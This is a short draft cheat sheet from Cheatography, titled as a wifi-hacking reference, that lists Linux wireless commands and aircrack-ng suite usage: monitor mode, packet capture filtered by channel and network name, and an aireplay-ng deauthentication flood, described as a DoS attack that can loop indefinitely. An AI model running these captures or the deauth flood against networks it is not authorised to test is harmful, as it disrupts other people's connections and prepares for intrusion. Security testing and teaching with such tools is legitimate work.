Show Menu
Cheatography

Wifi-Hacking Cheat Sheet (DRAFT) by

Basic Wifi Hacking Commands

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Basic Commands

iwconfig
Show wireless interfaces
iwlist
Show inform­ations about wireless interfaces
iwlist wlan0 scanning
Show inform­ation about wireless networks next to interface
iwconfig wlan0 channel <n>
Change the channel of interface wlan0 to <n>
iwconfig wlan0 down
Disables wlan0 interface
iwconfig wlan0 up
Enables wlan0 interface
iwconfig wlan1 mode <Ad­-Ho­c|A­uto­|Ma­gan­ed|­Mas­ter­|Mo­nit­or|­Rep­eat­er|­Sec­ond­ary>
Change mode of interface wlan0

Aircra­ck-ng basic

airmon-ng check kill
Disabel all process that could causa troubles in wifi hacking
airmon-ng start wlan0
Put wlan0 interface on monitor mode
airmon-ng stop wlan0mon
Put wlan0 interface back to normal
airodu­mp-ng wlan0mon
Start packet capture on wlan0mon
airodu­mp-ng wlan0mon --channel <n> --essid <Wi­fi-­Nam­e>
Filter packter capture with channel and Wifi ESSID
airodu­mp-ng wlan0mon --channel <n> --essid <Wi­fi-­Nam­e> -w <fi­len­ame>
Record packet capture in <fi­len­ame>
airodu­mp-ng -r file.pcap
Reads file.pcap as in airodu­mp-ng
airepl­ay-ng --deauth <n> -a <BS­SID> wlan1mon
Send DoS attack on BSSID with n packets. 0 means infinity loop.